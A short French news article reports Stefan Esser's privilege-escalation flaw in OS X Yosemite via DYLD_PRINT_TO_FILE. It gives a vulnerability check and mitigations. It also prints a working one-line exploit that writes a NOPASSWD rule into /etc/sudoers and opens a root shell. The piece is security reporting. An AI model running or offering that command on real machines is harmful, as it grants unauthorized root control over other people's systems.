Prendre le contrôle d’un Mac en une ligne de code

Stefan Esser, un chercheur du spécialiste de la sécurité SektionEins, a découvert une faille de sécurité dans la version 10.10 d’OS X, nom de code Yosemite, causée par l’introduction de la nouvelle variable d’environnement DYLD_PRINT_TO_FILE .

Numinit, un lecteur de Reddit a réussi à faire tenir le code malveillant en une ligne:

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

Son exploitation permet d’obtenir l’accès root, l’accès le plus privilégié, sur tout le système d’exploitation.

Il est possible de déterminer si son système est vulnérable en écrivant la ligne de commande:

$ EDITOR=/usr/bin/true DYLD_PRINT_TO_FILE=/this_system_is_vulnerable crontab -e

Si le fichier this_system_is_vulnerable apparaît, le système est vulnérable.

 

Pour se protéger, il n’y a pour le moment que deux solutions:

– Installer la bêta d’OS X 10.11

– Installer une extension du noyau programmée par SektionEins: SUIDGuard.

Comme le déplore Esser, Apple a été informé du bogue de sécurité depuis des mois, mais conformément à ses habitudes n’offre aucun correctif de sécurité pour la version actuelle du système d’exploitation.